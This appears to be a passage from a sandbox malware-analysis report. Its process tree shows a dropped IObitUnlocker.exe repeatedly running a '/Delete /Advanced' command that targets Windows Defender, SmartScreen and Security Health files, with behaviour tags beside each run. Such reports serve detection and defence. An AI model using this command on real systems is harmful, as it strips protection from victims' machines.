                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1124
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5164
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4324
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3536
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1456
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4352
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5984
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:428
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5088
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3584
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2012
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
